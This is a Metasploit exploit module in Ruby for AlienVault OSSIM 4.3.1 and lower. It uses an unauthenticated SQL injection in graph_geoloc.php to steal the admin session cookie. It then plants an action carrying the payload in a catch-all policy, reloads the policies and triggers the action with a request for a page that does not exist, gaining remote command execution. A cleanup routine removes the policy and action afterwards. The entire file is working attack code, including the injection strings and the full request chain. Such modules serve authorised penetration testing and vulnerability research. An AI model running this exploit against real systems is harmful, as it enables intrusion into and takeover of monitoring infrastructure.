##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info={})11super(update_info(info,12'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution",13'Description' => %q{14This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault15OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an16active admin session ID. If an administrator level user is identified, remote code execution17can be gained by creating a high priority policy with an action containing our payload.18},19'License' => MSF_LICENSE,20'Author' =>21[22'Sasha Zivojinovic', # SQLi discovery23'xistence <xistence[at]0x90.nl>' # Metasploit module24],25'References' =>26[27['CVE', '2016-8581'],28['OSVDB', '106252'],29['EDB', '33006']30],31'DefaultOptions' =>32{33'SSL' => true,34'WfsDelay' => 1035},36'Platform' => 'unix',37'Arch' => ARCH_CMD,38'Payload' =>39{40'Compat' =>41{42'RequiredCmd' => 'generic perl python',43}44},45'Targets' =>46[47['Alienvault OSSIM 4.3', {}]48],49'Privileged' => true,50'DisclosureDate' => '2014-04-24',51'DefaultTarget' => 0))5253register_options(54[55Opt::RPORT(443),56OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])57])58end596061def check62marker = rand_text_alpha(6)63sqli_rand = rand_text_numeric(4+rand(4))64sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "65sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"6667res = send_request_cgi({68'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),69'vars_get' => { 'date_from' => sqli 
}70})7172if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root73return Exploit::CheckCode::Vulnerable74else75print_status("#{res.body}")76return Exploit::CheckCode::Safe77end7879end808182def exploit83marker = rand_text_alpha(6)84sqli_rand = rand_text_numeric(4+rand(4))85sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "86sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"8788print_status("Trying to grab admin session through SQLi")8990res = send_request_cgi({91'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),92'vars_get' => { 'date_from' => sqli }93})9495if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/96admin_session = $197@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")98print_status("Admin session cookie is [ #{@cookie} ]")99else100fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")101end102103# Creating an Action containing our payload, which will be executed by any event (not only alarms)104action = rand_text_alpha(8+(rand(8)))105res = send_request_cgi({106'method' => 'POST',107'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),108'cookie' => @cookie,109'vars_post' => {110'action' => 'new',111'action_name' => action,112'descr' => action,113'action_type' => '2',114'only' => 'on',115'cond' => 'True',116'exec_command' => payload.encoded117}118})119120if res && res.code == 200121print_status("Created Action [ #{action} ]")122else123fail_with(Failure::Unknown, "#{peer} - Action creation failed!")124end125126# Retrieving the Action ID, used to clean up the action after successful exploitation127res = send_request_cgi({128'method' => 'POST',129'uri' => normalize_uri(target_uri.path, "ossim", "action", 
"getaction.php"),130'cookie' => @cookie,131'vars_post' => {132'page' => '1',133'rp' => '2000'134}135})136137if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/138@action_id = $1139print_status("Action ID is [ #{@action_id} ]")140else141fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")142end143144# Retrieving the policy data, necessary for proper cleanup after succesful exploitation145res = send_request_cgi({146'method' => 'GET',147'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),148'cookie' => @cookie,149'vars_get' => {150'm_opt' => 'configuration',151'sm_opt' => 'threat_intelligence',152'h_opt' => 'policy'153}154})155156if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/157policy_ctx = $1158policy_group = $2159print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")160else161fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")162end163164# Creating policy which will be triggered by any source/destination165policy = rand_text_alpha(8+(rand(8)))166res = send_request_cgi({167'method' => 'POST',168'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),169'cookie' => @cookie,170'vars_post' => {171'descr' => policy,172'active' => '1',173'group' => policy_group,174'ctx' => policy_ctx,175'order' => '1', # Makes this the first policy, overruling all the other policies176'action' => 'new',177'sources[]' => '00000000000000000000000000000000', # Source is ANY178'dests[]' => '00000000000000000000000000000000', # Destination is ANY179'portsrc[]' => '0', # Any source port180'portdst[]' => '0', # Any destination port181'plug_type' => '1', # Taxonomy182'plugins[0]' => 'on',183'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found184'tax_pt' => '0',185'tax_cat' => '0',186'tax_subc' => '0',187'mboxs[]' => 
'00000000000000000000000000000000',188'rep_act' => '0',189'rep_sev' => '1',190'rep_rel' => '1',191'rep_dir' => '0',192'ev_sev' => '1',193'ev_rel' => '1',194'tzone' => 'Europe/Amsterdam',195'date_type' => '1',196'begin_hour' => '0',197'begin_minute' => '0',198'begin_day_week' => '1',199'begin_day_month' => '1',200'begin_month' => '1',201'end_hour' => '23',202'end_minute' => '59',203'end_day_week' => '7',204'end_day_month' => '31',205'end_month' => '12',206'actions[]' => @action_id,207'sim' => '1',208'priority' => '1',209'qualify' => '1',210'correlate' => '0', # Don't make any correlations211'cross_correlate' => '0', # Don't make any correlations212'store' => '0' # We don't want to store anything :)213}214})215216if res && res.code == 200217print_status("Created Policy [ #{policy} ]")218else219fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")220end221222# Retrieve policy ID, needed for proper cleanup after succesful exploitation223res = send_request_cgi({224'method' => 'POST',225'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),226'cookie' => @cookie,227'vars_get' => {228'ctx' => policy_ctx,229'group' => policy_group230},231'vars_post' => {232'page' => '1',233'rp' => '2000'234}235})236if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/237@policy_id = $1238print_status("Policy ID [ #{@policy_id} ] retrieved!")239else240fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")241end242243# Reload the policies to make our new policy active244print_status("Reloading Policies")245res = send_request_cgi({246'method' => 'GET',247'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),248'cookie' => @cookie,249'vars_get' => {250'what' => 'policies',251'back' => '../policy/policy.php'252}253})254255if res && res.code == 200256print_status("Policies reloaded!")257else258fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")259end260261# Request a non-existing page, which will 
trigger a SIEM event (and thus our payload), but not an alarm.262dont_exist = rand_text_alpha(8+rand(4))263print_status("Triggering policy and action by requesting a non existing url")264res = send_request_cgi({265'method' => 'GET',266'uri' => normalize_uri(target_uri.path, dont_exist),267'cookie' => @cookie268})269270if res and res.code == 404271print_status("Payload delivered")272else273fail_with(Failure::Unknown, "#{peer} - Payload failed!")274end275276end277278279def cleanup280begin281# Clean up, retrieve token so that the policy can be removed282print_status("Cleaning up")283res = send_request_cgi({284'method' => 'POST',285'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),286'cookie' => @cookie,287'vars_post' => { 'f_name' => 'delete_policy' }288})289290if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/291token = $1292print_status("Token [ #{token} ] retrieved")293else294print_warning("Unable to retrieve token")295end296297# Remove our policy298res = send_request_cgi({299'method' => 'GET',300'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),301'cookie' => @cookie,302'vars_get' => {303'confirm' => 'yes',304'id' => @policy_id,305'token' => token306}307})308309if res && res.code == 200310print_status("Policy ID [ #{@policy_id} ] removed")311else312print_warning("Unable to remove Policy ID")313end314315# Remove our action316res = send_request_cgi({317'method' => 'GET',318'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),319'cookie' => @cookie,320'vars_get' => {321'id' => @action_id,322}323})324325if res && res.code == 200326print_status("Action ID [ #{@action_id} ] removed")327else328print_warning("Unable to remove Action ID")329end330331# Reload the policies to revert back to the state before exploitation332print_status("Reloading Policies")333res = send_request_cgi({334'method' => 'GET',335'uri' => normalize_uri(target_uri.path, "ossim", "conf", 
"reload.php"),336'cookie' => @cookie,337'vars_get' => {338'what' => 'policies',339'back' => '../policy/policy.php'340}341})342343if res && res.code == 200344print_status("Policies reloaded!")345else346fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")347end348349ensure350super # mixins should be able to cleanup even in case of Exception351end352end353end354355356